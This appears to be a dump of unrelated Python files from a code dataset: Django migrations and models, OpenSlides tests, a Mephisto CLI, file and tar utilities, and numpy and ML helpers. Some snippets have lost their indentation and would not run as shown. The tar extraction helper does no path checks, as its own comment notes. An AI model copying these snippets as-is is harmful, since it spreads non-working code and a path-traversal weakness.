                ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
                ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
                ('tmdb_id', models.TextField()),
                ('title', models.TextField()),
                ('original_title', models.TextField()),
                ('slug', iioy.core.fields.SlugField(slug_field='title')),
                ('tagline', models.TextField(null=True)),
                ('budget', models.BigIntegerField(null=True)),
                ('revenue', models.BigIntegerField(null=True)),
                ('homepage', models.URLField(null=True)),
                ('imdb_id', models.TextField()),
                ('synopsis', models.TextField(null=True)),
                ('runtime', models.IntegerField(null=True)),
                ('mpaa_rating', models.TextField(null=True)),
                ('release_date', models.DateField(null=True)),
                ('backdrop_url', models.URLField(null=True)),
                ('mobile_backdrop_url', models.URLField(null=True)),
                ('poster_url', models.URLField(null=True)),
                ('mobile_poster_url', models.URLField(null=True)),
                ('trailer_url', models.URLField(null=True)),
            ],
        ),
        migrations.CreateModel(
            name='MovieList',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
                ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
                ('source', models.TextField()),
                ('name', models.TextField()),
                ('slug', iioy.core.fields.SlugField(slug_field='name')),
            ],
            options={
                'ordering': ('-modified', '-created'),
                'get_latest_by': 'modified',
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='MovieRating',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
                ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
                ('source', models.TextField()),
                ('value', models.TextField()),
            ],
            options={
                'ordering': ('-modified', '-created'),
                'get_latest_by': 'modified',
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Person',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
                ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
                ('tmdb_id', models.TextField()),
                ('name', models.TextField()),
                ('profile_picture_url', models.URLField()),
                ('biography', models.TextField(null=True)),
                ('day_of_birth', models.DateField(null=True)),
                ('day_of_death', models.DateField(null=True)),
                ('homepage', models.URLField(null=True)),
                ('birthplace', models.TextField(null=True)),
                ('aliases', django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), default=list, size=None)),
            ],
        ),
        # Relations and lookup indexes (added after all tables exist).
        migrations.AddIndex(
            model_name='person',
            index=models.Index(fields=['tmdb_id'], name='movies_pers_tmdb_id_944488_idx'),
        ),
        migrations.AddField(
            model_name='movierating',
            name='movie',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ratings', to='movies.Movie'),
        ),
        migrations.AddField(
            model_name='movielist',
            name='movies',
            field=models.ManyToManyField(to='movies.Movie'),
        ),
        migrations.AddField(
            model_name='movie',
            name='genres',
            field=models.ManyToManyField(related_name='movies', to='movies.Genre'),
        ),
        migrations.AddField(
            model_name='movie',
            name='similar_movies',
            field=models.ManyToManyField(related_name='_movie_similar_movies_+', to='movies.Movie'),
        ),
        migrations.AddField(
            model_name='castmember',
            name='movie',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cast_members', to='movies.Movie'),
        ),
        migrations.AddField(
            model_name='castmember',
            name='person',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='roles', to='movies.Person'),
        ),
        migrations.AddIndex(
            model_name='movie',
            index=models.Index(fields=['tmdb_id'], name='movies_movi_tmdb_id_0e4cad_idx'),
        ),
        migrations.AddIndex(
            model_name='movie',
            index=models.Index(fields=['imdb_id'], name='movies_movi_imdb_id_d04af4_idx'),
        ),
    ]
|
19,762 | 417345060a25d108a65f56efb988f684cc702c08 | from contextlib import closing
class RefrigeratorRaider:
    """Demo of contextlib.closing: close() runs even if take() raises."""

    def open(self):
        print('open the fridge door')

    def take(self, food):
        print('Finding {}...'.format(food))
        # Asking for pizza simulates a failure mid-operation.
        if food == 'pizza':
            raise RuntimeError("too much pizza is not good for your health!")
        print("Taking {}...".format(food))

    def close(self): # this implements the closing protocol.
        print("Close the fridge door!")

    def raid(self, food):
        # closing() guarantees close() is called on the way out — even when
        # take() raises.
        with closing(RefrigeratorRaider()) as fridge:
            fridge.open()
            fridge.take(food)
def main():
    """Run the demo: one successful raid, then one that raises.

    BUG FIX: the second raid raises RuntimeError ('pizza'), which
    previously escaped main() and crashed the script after close() ran.
    It is now caught and reported so the demo exits cleanly.
    """
    r = RefrigeratorRaider()
    r.raid('two apples!')
    try:
        # 'pizza' makes take() raise; closing() still calls close().
        r.raid('pizza')
    except RuntimeError as error:
        print(error)
if __name__ == '__main__':
main()
|
19,763 | b5ada0f8651a0e0593a2ceee632223218ffd5ec7 | from unittest.mock import Mock
from openslides_backend.action.action_handler import ActionHandler
from openslides_backend.action.util.typing import Payload
from .base import BaseActionTestCase
class GeneralActionCommandFormat(BaseActionTestCase):
"""
Tests the interface to datastore-command with one WriteRequest
per payload-action and it's own locked_fields
"""
def get_action_handler(self) -> ActionHandler:
logger = Mock()
config = Mock()
handler = ActionHandler(config, self.services, logger)
handler.user_id = 1
handler.internal = False
return handler
def test_parse_actions_create_2_actions(self) -> None:
self.create_model(
"meeting/1", {"name": "meeting1", "is_active_in_organization_id": 1}
)
payload: Payload = [
{
"action": "group.create",
"data": [
{
"name": "group 1",
"meeting_id": 1,
}
],
},
{
"action": "group.create",
"data": [
{
"name": "group 2",
"meeting_id": 1,
}
],
},
]
action_handler = self.get_action_handler()
write_requests, _ = action_handler.parse_actions(payload)
self.assertEqual(len(write_requests), 2)
self.assertEqual(len(write_requests[0].events), 2)
self.assertCountEqual(
write_requests[0].locked_fields.keys(),
[
"group/meeting_id",
"group/weight",
"meeting/1/group_ids",
],
)
self.assertEqual(write_requests[0].events[0]["type"], "create")
self.assertEqual(write_requests[0].events[1]["type"], "update")
self.assertEqual(str(write_requests[0].events[0]["fqid"]), "group/1")
self.assertEqual(str(write_requests[0].events[1]["fqid"]), "meeting/1")
self.assertEqual(len(write_requests[1].events), 2)
self.assertCountEqual(
write_requests[1].locked_fields.keys(),
[
"group/meeting_id",
"group/weight",
],
)
def test_parse_actions_create_1_2_events(self) -> None:
self.create_model(
"meeting/1", {"name": "meeting1", "is_active_in_organization_id": 1}
)
payload: Payload = [
{
"action": "group.create",
"data": [
{
"name": "group 1",
"meeting_id": 1,
},
{
"name": "group 2",
"meeting_id": 1,
},
],
},
]
action_handler = self.get_action_handler()
write_requests, _ = action_handler.parse_actions(payload)
self.assertEqual(len(write_requests), 1)
self.assertEqual(len(write_requests[0].events), 3)
self.assertCountEqual(
write_requests[0].locked_fields.keys(),
[
"group/meeting_id",
"group/weight",
"meeting/1/group_ids",
],
)
self.assertEqual(write_requests[0].events[0]["type"], "create")
self.assertEqual(write_requests[0].events[1]["type"], "create")
self.assertEqual(write_requests[0].events[2]["type"], "update")
self.assertEqual(str(write_requests[0].events[0]["fqid"]), "group/1")
self.assertEqual(str(write_requests[0].events[1]["fqid"]), "group/2")
self.assertEqual(str(write_requests[0].events[2]["fqid"]), "meeting/1")
def test_create_2_actions(self) -> None:
self.create_model(
"meeting/1", {"name": "meeting1", "is_active_in_organization_id": 1}
)
response = self.request_json(
[
{
"action": "group.create",
"data": [
{
"name": "group 1",
"meeting_id": 1,
}
],
},
{
"action": "group.create",
"data": [
{
"name": "group 2",
"meeting_id": 1,
}
],
},
],
)
self.assert_status_code(response, 400)
self.assertIn(
"Datastore service sends HTTP 400. The following locks were broken: 'group/meeting_id', 'group/weight'",
response.json["message"],
)
self.assert_model_not_exists("group/1")
self.assert_model_not_exists("group/2")
self.assert_model_exists("meeting/1", {"group_ids": None})
def test_create_1_2_events(self) -> None:
self.create_model(
"meeting/1", {"name": "meeting1", "is_active_in_organization_id": 1}
)
response = self.request_multi(
"group.create",
[
{
"name": "group 1",
"meeting_id": 1,
},
{
"name": "group 2",
"meeting_id": 1,
},
],
)
self.assert_status_code(response, 200)
self.assert_model_exists("group/1", {"name": "group 1", "meeting_id": 1})
self.assert_model_exists("group/2", {"name": "group 2", "meeting_id": 1})
def test_update_2_actions(self) -> None:
self.set_models(
{
"meeting/1": {
"name": "name1",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"meeting/2": {
"name": "name2",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"committee/1": {"name": "test_committee"},
}
)
response = self.request_json(
[
{
"action": "meeting.update",
"data": [
{
"id": 1,
"name": "name1_updated",
}
],
},
{
"action": "meeting.update",
"data": [
{
"id": 2,
"name": "name2_updated",
}
],
},
],
)
self.assert_status_code(response, 200)
meeting1 = self.get_model("meeting/1")
assert meeting1.get("name") == "name1_updated"
meeting2 = self.get_model("meeting/2")
assert meeting2.get("name") == "name2_updated"
def test_update_1_2_events(self) -> None:
self.set_models(
{
"meeting/1": {
"name": "name1",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"meeting/2": {
"name": "name2",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"committee/1": {"name": "test_committee"},
}
)
response = self.request_multi(
"meeting.update",
[
{
"id": 1,
"name": "name1_updated",
},
{
"id": 2,
"name": "name2_updated",
},
],
)
self.assert_status_code(response, 200)
meeting1 = self.get_model("meeting/1")
assert meeting1.get("name") == "name1_updated"
meeting2 = self.get_model("meeting/2")
assert meeting2.get("name") == "name2_updated"
def test_delete_2_actions(self) -> None:
self.set_models(
{
"meeting/1": {
"name": "name1",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"meeting/2": {
"name": "name2",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"committee/1": {"name": "test_committee", "meeting_ids": [1, 2]},
}
)
response = self.request_json(
[
{
"action": "meeting.delete",
"data": [
{
"id": 1,
}
],
},
{
"action": "meeting.delete",
"data": [
{
"id": 2,
}
],
},
],
)
self.assert_status_code(response, 200)
self.assert_model_deleted("meeting/1")
self.assert_model_deleted("meeting/2")
self.assert_model_exists("committee/1", {"meeting_ids": []})
def test_delete_1_2_events(self) -> None:
self.set_models(
{
"meeting/1": {
"name": "name1",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"meeting/2": {
"name": "name2",
"committee_id": 1,
"welcome_title": "t",
"is_active_in_organization_id": 1,
},
"committee/1": {"name": "test_committee", "meeting_ids": [1, 2]},
}
)
response = self.request_multi(
"meeting.delete",
[
{
"id": 1,
},
{
"id": 2,
},
],
)
self.assert_status_code(response, 200)
self.assert_model_deleted("meeting/1")
self.assert_model_deleted("meeting/2")
self.assert_model_exists("committee/1", {"meeting_ids": []})
|
19,764 | d2279821b40b9ac41efd7a8da878b151e4676a2b | # -*- coding:utf-8 -*-
import shutil
import os
import re
import sys
import json
import pymysql
import requests
import tempfile
def get_cur_path():
    '''
    @summary: directory containing the running program -- the frozen
              executable's directory under PyInstaller/py2exe, else
              this module's directory.
    '''
    if getattr(sys, 'frozen', False):
        # frozen bundle: __file__ is unreliable, use the executable path
        return os.path.dirname(sys.executable)
    if __file__:
        return os.path.dirname(__file__)
def get_files(dir_name, recursive=False, suffix_names=(".TXT",)):
    '''
    @summary: yield the full path of every file under *dir_name* whose
              upper-cased suffix is in *suffix_names* (an empty/falsy
              tuple matches everything); descend into sub-directories
              when *recursive* is true.
    '''
    if not os.path.isdir(dir_name):
        return
    for entry in os.listdir(dir_name):
        full_name = os.path.join(dir_name, entry)
        if os.path.isfile(full_name):
            # suffix filter is case-insensitive on the file side only;
            # suffix_names are expected upper-cased (e.g. ".TXT")
            if not suffix_names or get_suffix(entry).upper() in suffix_names:
                yield full_name
        elif recursive and os.path.isdir(full_name):
            for nested in get_files(full_name, recursive, suffix_names):
                yield nested
def get_suffix(file_name):
    '''
    @summary: get suffix name with point (.txt)
    @param file_name: file name
    @return: suffix with point like (.txt); empty string when the
             name has no extension
    '''
    # os.path.splitext always returns a 2-tuple, so the original
    # try/except IndexError was dead code and has been removed.
    return os.path.splitext(file_name)[1]
def get_file_name(f_name):
    '''
    @summary: return file name without suffix
    '''
    # os.path.splitext cannot fail on a string argument, so the
    # original broad except-and-print wrapper was dead code.
    return os.path.splitext(f_name)[0]
def get_create_time(file_name):
    '''
    @summary: creation timestamp of *file_name* as a float epoch.
    NOTE(review): getctime is metadata-change time on Unix, creation
    time only on Windows -- confirm which platform callers assume.
    '''
    #return os.stat(file_name).st_ctime
    #return datetime.fromtimestamp(os.path.getctime(file_name))
    return os.path.getctime(file_name)
def check_path(path):
    '''
    @summary: ensure *path* exists as a directory
    @return: True if the directory already exists or was created,
             False when creation failed
    '''
    if os.path.isdir(path):
        return True
    try:
        os.makedirs(path)
    except OSError:
        # narrowed from bare Exception: covers permission errors and
        # the race where the path appears (or exists as a plain file)
        # between the isdir check and makedirs
        return False
    return True
def is_crown_dir(dir_name):
    '''
    @summary: True when *dir_name* is a directory containing no
              sub-directories (a "leaf" / crown directory); False for
              non-directories.
    '''
    if not os.path.isdir(dir_name):
        return False
    return not any(
        os.path.isdir(os.path.join(dir_name, entry))
        for entry in os.listdir(dir_name)
    )
def get_crown_dirs(dir_name):
    '''
    @summary: recursively yield every leaf ("crown") directory below
              *dir_name* -- i.e. directories with no sub-directories.
    '''
    if not os.path.isdir(dir_name):
        return
    for entry in os.listdir(dir_name):
        full_name = os.path.join(dir_name, entry)
        if not os.path.isdir(full_name):
            continue
        if is_crown_dir(full_name):
            yield full_name
        else:
            for nested in get_crown_dirs(full_name):
                yield nested
def remove_empty_dir(path):
    '''
    @summary: depth-first removal of *path* and any empty
              sub-directories below it; directories that still contain
              files are left in place.
    '''
    if not os.path.isdir(path):
        return
    for entry in os.listdir(path):
        remove_empty_dir(os.path.join(path, entry))
    if os.listdir(path):
        # still contains files (or non-empty dirs) -- keep it
        return
    try:
        os.rmdir(path)
    except IOError:
        print("ERROR")
def get_content_list(f_txt):
    '''
    @summary: lazily yield each line of the UTF-8 text file *f_txt*,
              stripped of surrounding whitespace (blank lines yield
              empty strings).
    '''
    with open(f_txt, "r", encoding="utf-8") as h_file:
        for line in h_file:
            yield line.strip()
def get_content(f_txt, encoding=None):
    '''
    @summary: read the whole text file *f_txt* and return it as one
              string
    @param encoding: passed straight through to open(); None means
                     the platform default
    '''
    with open(f_txt, "r", encoding=encoding) as h_file:
        return h_file.read()
def save_file(f_txt, text_list):
    '''
    @summary: overwrite *f_txt* with the strings in *text_list*
              (written as-is -- writelines adds no newlines)
    '''
    with open(f_txt, "w") as h_file:
        h_file.writelines(text_list)
def save_mess(f_name, mess_str):
    '''
    @summary: append *mess_str* to *f_name* (UTF-8). A list is joined
              with newlines; either way a trailing newline is added.
    '''
    with open(f_name, "a", encoding="utf-8") as fp:
        text = "\n".join(mess_str) if isinstance(mess_str, list) else mess_str
        fp.write(text)
        fp.write("\n")
def load_json(f_json):
    '''
    @summary: parse the UTF-8 JSON file *f_json* and return the
              resulting object.
    '''
    # The original read the file line by line, stripped newlines and
    # concatenated the pieces before json.loads -- json.load handles
    # whitespace itself, so the hand-rolled loop was unnecessary.
    with open(f_json, "r", encoding="utf-8") as fp:
        return json.load(fp)
def get_video_file(path, video_id):
    '''
    @summary: return the first .MP4/.AVI file found (recursively)
              under *path* whose full path contains *video_id*, or
              None when nothing matches.
    '''
    for f_video in get_files(path, True, (".MP4", ".AVI")):
        # BUG FIX: the original used f_video.find(video_id) <= 0,
        # which wrongly rejected a match at index 0
        if video_id in f_video:
            return f_video
def get_upload_dict():
    '''
    @summary: parse upload.log (tab-separated "category<TAB>key"
              lines) into {category: [key, ...]}; malformed lines are
              skipped.
    '''
    f_log = "upload.log"
    upload_dict = {}
    if not os.path.isfile(f_log):
        return upload_dict
    for content in get_content_list(f_log):
        value_list = content.strip().split("\t")
        if len(value_list) != 2:
            # malformed line -- skipped explicitly (the original hid
            # this in a silent `except Exception: pass`)
            continue
        cat_name, key = value_list
        upload_dict.setdefault(cat_name, []).append(key)
    return upload_dict
def get_int_list(str_value):
    '''Return every run of decimal digits in *str_value* as strings.'''
    return re.findall(r'\d+', str_value)
def get_hex_list(str_value):
    '''Return every run of hexadecimal digits in *str_value*.

    BUG FIX: the original character class [0-9|a-f|A-F] contained a
    literal '|' (alternation has no meaning inside [...]), so pipe
    characters were wrongly treated as hex digits.
    '''
    return re.findall(r'[0-9a-fA-F]+', str_value)
def save_image(u_dict, tar_path):
    '''
    @summary: create directory *tar_path* and copy up to 400 image
              files referenced by *u_dict* (key -> source path) into
              it, keeping their base names.
    '''
    os.mkdir(tar_path)
    for count, key in enumerate(u_dict):
        if count >= 400:
            # BUG FIX: the original incremented before checking and
            # therefore copied only 399 files
            break
        f_img = u_dict[key]
        dst = os.path.join(tar_path, os.path.basename(f_img))
        shutil.copy(f_img, dst)
import tarfile
def extract_tar_files(f_tar):
    '''
    @summary: extract every member of the archive *f_tar* into a
              "photos" directory next to the archive file.
    NOTE(review): members are extracted as-is; a hostile archive with
    "../" paths could escape des_dir -- for untrusted input consider
    tarfile's extraction filters.
    '''
    des_dir = os.path.join(os.path.dirname(f_tar), "photos")
    with tarfile.open(f_tar) as fp:
        for member in fp.getnames():
            fp.extract(member, path=des_dir)
def make_targz(output_filename, keys):
    '''
    @summary: create gzip-compressed tar *output_filename* containing
              the existing files in *keys*, flattened to base names.
    @return: True on success, False on any failure (best-effort)
    '''
    try:
        f_path = os.path.dirname(output_filename)
        # BUG FIX: when output_filename has no directory component,
        # dirname() is "" and os.makedirs("") raised -- guard on f_path
        if f_path and not os.path.isdir(f_path):
            os.makedirs(f_path)
        with tarfile.open(output_filename, "w:gz") as h_tar:
            for f_img in keys:
                if not os.path.isfile(f_img):
                    continue
                h_tar.add(f_img, arcname=os.path.basename(f_img))
    except Exception:
        # deliberately broad: callers only see a boolean result
        return False
    return True
def get_escape_str(ori_str):
    '''
    @summary: quote *ori_str* for interpolation into a SQL statement:
              None maps to pymysql.NULL, strings are escaped and
              single-quoted, everything else passes through unchanged.
    NOTE(review): pymysql.escape_string was removed from the top-level
    namespace in PyMySQL 1.0 -- verify the pinned version, and prefer
    parameterized queries for untrusted input.
    '''
    # for pymysql get safe string
    if ori_str is None:
        return pymysql.NULL
    if isinstance(ori_str, str):
        return "'{}'".format(pymysql.escape_string(ori_str))
    return ori_str
def string_to_file(string):
    '''
    @summary: write *string* (bytes -- the file is opened in binary
              mode) into a NamedTemporaryFile, rewind it, and return
              the open file object; the file is deleted on close.
    '''
    temp_file = tempfile.NamedTemporaryFile()
    temp_file.write(string)
    temp_file.flush()
    temp_file.seek(0)
    return temp_file
def get_remote_file(url):
    '''
    @summary: download *url* with a desktop-browser User-Agent and
              return the body as a rewound temporary file object, or
              None when the response status is not 200.
    '''
    session = requests.Session()
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                             "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 "
                             "Safari/537.36",
               # BUG FIX: the original sent the misspelled header
               # 'Rerfer', which servers silently ignore
               'Referer': url}
    response = session.get(url, headers=headers)
    if response.status_code != 200:
        return
    return string_to_file(response.content)
|
19,765 | e2e615fd1c24d61eeb1789f7e21719d2c86f86eb | from src.meshine_project.meshine_api.WebMetaDataGenerator.WebMetaDataGenerator_dev import WebMetaDataGenerator
webMetaDataGenerator = WebMetaDataGenerator('https://www.presse-citron.net/comment-reveiller-creativite-innover-lab-postal-2018/')
webMetaDataGenerator.generate_tags()
#webMetaDataGenerator.tags_from_newspaper() |
19,766 | 0b30a3a4f53d3e0bcfec7b44140bc4e11130a10a | # pylint: disable=W5101
from django.db import models
from . import Event
class FeatureConfiguration(models.Model):
"""
Recursos ativados pela Congressy para ser utilizado em um evento.
"""
SYSTEM_USER_NAME = 'system'
class Meta:
verbose_name = 'Configuração de Features'
verbose_name_plural = 'Configurações de Features'
def __str__(self):
return self.event.name
event = models.OneToOneField(
Event,
on_delete=models.CASCADE,
primary_key=True,
verbose_name='evento',
related_name='feature_configuration',
)
last_updated_by = models.CharField(
max_length=255,
verbose_name="atualizado por",
default=SYSTEM_USER_NAME,
)
feature_survey = models.BooleanField(
default=False,
verbose_name='funcionalidade - form. personalizado',
help_text='Liberar funcionalidade de formulário personalizado no'
' evento.'
)
feature_checkin = models.BooleanField(
default=False,
verbose_name='funcionalidade - check-in',
help_text='Liberar funcionalidade de check-in no evento.'
)
feature_certificate = models.BooleanField(
default=False,
verbose_name='funcionalidade - certificado',
help_text='Liberar funcionalidade de certificado no evento.'
)
feature_products = models.BooleanField(
default=False,
verbose_name='funcionalidade - opcionais',
help_text='Liberar funcionalidade de opcionais no evento.'
)
feature_services = models.BooleanField(
default=False,
verbose_name='funcionalidade - atividades extras',
help_text='Liberar funcionalidade de atividades extras no evento.'
)
feature_internal_subscription = models.BooleanField(
default=False,
verbose_name='funcionalidade - inscrições internas',
help_text='Liberar funcionalidade de organizadores poderão inserir '
'inscrição interna manualmente.'
)
feature_manual_payments = models.BooleanField(
default=False,
verbose_name='funcionalidade - pagamentos manuais',
help_text='Liberar funcionalidade de organizadores poderão inserir '
'pagamentos manuais.'
)
feature_boleto_expiration_on_lot_expiration = models.BooleanField(
default=False,
verbose_name='funcionalidade - vencimento dos boletos',
help_text='Liberar funcionalidade vencimento dos boletos na da data '
'de vencimento dos lotes'
)
feature_import_via_csv = models.BooleanField(
default=False,
verbose_name='funcionalidade - importação via CSV',
help_text='Liberar funcionalidade de permitir importação via csv'
)
feature_multi_lots = models.BooleanField(
default=False,
verbose_name='funcionalidade - multi lotes',
help_text='Liberar funcionalidade de multi lotes'
)
feature_raffle = models.BooleanField(
default=False,
verbose_name='funcionalidade - sorteios',
help_text='Liberar funcionalidade de sorteios'
)
|
19,767 | ddcf30c942810dd7a167d8ed7d1ef898d2e7cd5b | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import click
from click_default_group import DefaultGroup
# @click.group(cls=DefaultGroup, default="web", default_if_no_args=True)
@click.group(cls=DefaultGroup)
def cli():
    # Top-level command group; DefaultGroup allows a default
    # subcommand to run when none is named (see commented variant
    # above this definition).
    pass
@cli.command("web")
def web():
"""Launch a local webserver with the Mephisto UI"""
from mephisto.client.server import app
app.run(debug=False)
@cli.command("check")
def check():
"""Checks that mephisto is setup correctly"""
from mephisto.core.local_database import LocalMephistoDB
from mephisto.core.utils import get_mock_requester
try:
db = LocalMephistoDB()
get_mock_requester(db)
except Exception as e:
click.echo("Something went wrong.")
click.echo(e)
return
click.echo("Mephisto seems to be set up correctly.")
@cli.command("requesters")
def list_requesters():
"""Lists all registered requesters"""
from mephisto.core.local_database import LocalMephistoDB
from tabulate import tabulate
db = LocalMephistoDB()
requesters = db.find_requesters()
dict_requesters = [r.to_dict() for r in requesters]
click.echo(tabulate(dict_requesters, headers="keys"))
@cli.command("register", context_settings={"ignore_unknown_options": True})
@click.argument("args", nargs=-1)
def register_provider(args):
"""Register a requester with a crowd provider"""
if len(args) == 0:
click.echo("Usage: mephisto register <provider_type> --arg1:value --arg2:value")
return
from mephisto.core.local_database import LocalMephistoDB
from mephisto.core.registry import get_crowd_provider_from_type
from mephisto.core.argparse_parser import parse_arg_dict, get_extra_argument_dicts
provider_type, requester_args = args[0], args[1:]
args_dict = dict(arg.split(":") for arg in requester_args)
transformed = dict(
(key, {"option_string": key, "value": value})
for (key, value) in args_dict.items()
)
crowd_provider = get_crowd_provider_from_type(provider_type)
RequesterClass = crowd_provider.RequesterClass
if len(requester_args) == 0:
from tabulate import tabulate
params = get_extra_argument_dicts(RequesterClass)
for param in params:
click.echo(param["desc"])
click.echo(tabulate(param["args"].values(), headers="keys"))
return
try:
parsed_options = parse_arg_dict(RequesterClass, transformed)
except Exception as e:
click.echo(str(e))
if "name" not in parsed_options:
click.echo("No name was specified for the requester.")
db = LocalMephistoDB()
requesters = db.find_requesters(requester_name=parsed_options["name"])
if len(requesters) == 0:
requester = RequesterClass.new(db, parsed_options["name"])
else:
requester = requesters[0]
try:
requester.register(parsed_options)
click.echo("Registered successfully.")
except Exception as e:
click.echo(str(e))
if __name__ == "__main__":
cli()
|
19,768 | adda98e0b3b8036a65d5392ebc212e4c2035f4ab | from sklearn.externals import joblib
import numpy as np
MLPCOD = joblib.load("./model/MLPCOD.save")
MLPEMI = joblib.load("./model/MLPEMI.save")
sc = joblib.load("./model/scaler.save")
def predict(age, autoBill, paytmFirst, postpaid, ppOutstanding, opIn6Months, op6MviaEpay, op6MViaCOD, mall6M, travel6M, totalMoney, walletMoney, ratio):
    """Score one customer with the COD and EMI MLP models.

    Returns [y_cod, y_emi] -- the two model predictions for the
    scaled feature row.

    Feature order must match the training data:
    ['age', 'Is_auto_billing_on', 'Is_paytm_first', 'Is_postpaid',
     'postpaid_outstanding', 'Orders_placed_in_6months',
     'Orders_placed_in_6months_via_epay', 'Orders_placed_in_6months_via_cod',
     'Total_money_on_order_from_mall_6months',
     'Total_money_on_order_on_travel_6months', 'Total_money_spent',
     'Total_money_added_on_wallet', 'RatioDvP']
    """
    # BUG FIX: the original ignored every argument and always scored
    # the same hard-coded sample row.
    X = np.array([[age, autoBill, paytmFirst, postpaid,
                   ppOutstanding, opIn6Months,
                   op6MviaEpay, op6MViaCOD,
                   mall6M,
                   travel6M, totalMoney,
                   walletMoney, ratio]])
    X_sc = sc.transform(X)
    y_cod = MLPCOD.predict(X_sc)
    y_emi = MLPEMI.predict(X_sc)
    return [y_cod, y_emi]
# X contains in this order: ['age', 'Is_auto_billing_on', 'Is_paytm_first', 'Is_postpaid',
# 'postpaid_outstanding', 'Orders_placed_in_6months',
# 'Orders_placed_in_6months_via_epay', 'Orders_placed_in_6months_via_cod',
# 'Total_money_on_order_from_mall_6months',
# 'Total_money_on_order_on_travel_6months', 'Total_money_spent',
# 'Total_money_added_on_wallet', 'RatioDvP']
# where RatioDvP is ("Orders_delivered_in_6months")/("Orders_placed_in_6months"+1)
# master data contains ['age', 'Id', 'Is_auto_billing_on', 'Is_paytm_first', 'Is_postpaid',
# 'postpaid_outstanding', 'Orders_placed_in_6months',
# 'Orders_placed_in_6months_via_epay', 'Orders_placed_in_6months_via_cod',
# 'Orders_placed_in_6months_via_emi', 'Orders_delivered_in_6months',
# 'Total_money_on_order_from_mall_6months',
# 'Total_money_on_order_on_travel_6months',
# 'Total_money_on_order_on_movie_6months', 'Total_money_spent',
# 'Total_money_added_on_wallet', 'CODorNot', 'EMIorNot', 'RatioDvP'] |
19,769 | a8459816e8f78aaab6fdf099346901e439c28f80 | import numpy as np
def multiply(m1, m2):
    '''Matrix product of m1 and m2 (np.dot).'''
    return np.dot(m1, m2)
def add(m1, m2):
    '''Element-wise sum of m1 and m2.'''
    return np.add(m1, m2)
def sub(m1, m2):
    '''Element-wise difference m1 - m2.'''
    return np.subtract(m1, m2)
def concat(m1, elem):
    '''Append *elem* as a new bottom row of the 2-D matrix *m1*.'''
    # ndmin=2 wraps the element(s) so concatenate sees a row vector
    to_concat = np.array([elem], ndmin=2)
    return np.concatenate((m1, to_concat), axis=0)
def cut_last_row(m1):
    '''Return *m1* without its last row.'''
    # m1[:np.shape(m1)[0] - 1][:] sliced off the last row and then
    # applied a no-op full slice; the negative index says it directly.
    return m1[:-1]
def activate_exp(x):
    '''Logistic sigmoid activation: 1 / (1 + exp(-x)).'''
    # BUG FIX: exp(x) / (1 + exp(x)) overflows to inf/inf = nan for
    # large positive x.  exp(-logaddexp(0, -x)) is the same value
    # computed stably, since logaddexp(0, -x) == log(1 + exp(-x)).
    return np.exp(-np.logaddexp(0, -x))
def activate_arctan(x):
    '''Arctangent activation function.'''
    return np.arctan(x)
def derivative_exp(x):
    '''Derivative of the logistic sigmoid: s(x) * (1 - s(x)).'''
    # BUG FIX: exp(x) / (1 + exp(x))**2 overflows to nan for large x;
    # compute the sigmoid stably first, then its derivative.
    s = np.exp(-np.logaddexp(0, -x))
    return s * (1.0 - s)
def derivative_arctan(x):
    '''Derivative of arctan: 1 / (x**2 + 1).'''
    return 1/(np.power(x, 2) + 1)
def transpose(x):
    '''Transpose of *x* (np.transpose).'''
    return np.transpose(x)
def normal_random_value(m, s, min_val=-np.inf, max_val=np.inf):
    '''Draw one sample from N(m, s) clamped to [min_val, max_val].'''
    sample = np.random.normal(m, s, (1, 1))
    # np.clip performs the same clamping the original did with two
    # np.place calls
    clipped = np.clip(sample, min_val, max_val)
    return clipped[0][0]
def normal_random_matrix(m, s, rows, columns, min_val=-np.inf, max_val=np.inf):
    '''rows x columns matrix of N(m, s) samples clamped to
    [min_val, max_val].'''
    samples = np.random.normal(m, s, (rows, columns))
    return np.clip(samples, min_val, max_val)
|
19,770 | 19764120a162a88df56c9e8fd1d6f1c9b73e6d69 | import logging
import ibmsecurity.utilities.tools as tools
import json
try:
basestring
except NameError:
basestring = (str, bytes)
logger = logging.getLogger(__name__)
def get_all(isamAppliance, check_mode=False, force=False):
    """
    Retrieving the list of federated directories
    (check_mode/force are accepted for interface symmetry with the
    mutating calls but unused by this read-only request.)
    """
    return isamAppliance.invoke_get("Retrieving the list of federated directories",
                                    "/isam/runtime_components/federated_directories/v1")
def get(isamAppliance, id, check_mode=False, force=False):
    """
    Retrieving the details for a particular federated directory
    :param id: identifier of the federated directory to fetch
    """
